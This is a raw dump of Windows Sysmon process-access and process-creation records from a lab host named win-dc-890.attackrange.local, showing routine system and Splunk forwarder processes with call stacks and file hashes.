10341000x80000000000000001052261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.118{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.118{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6B5-60EB-A67D-00000000CF01}1428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.118{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6B5-60EB-A67D-00000000CF01}1428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.103{466BC892-F6B5-60EB-A67D-00000000CF01}1428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001052257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.118{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.118{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 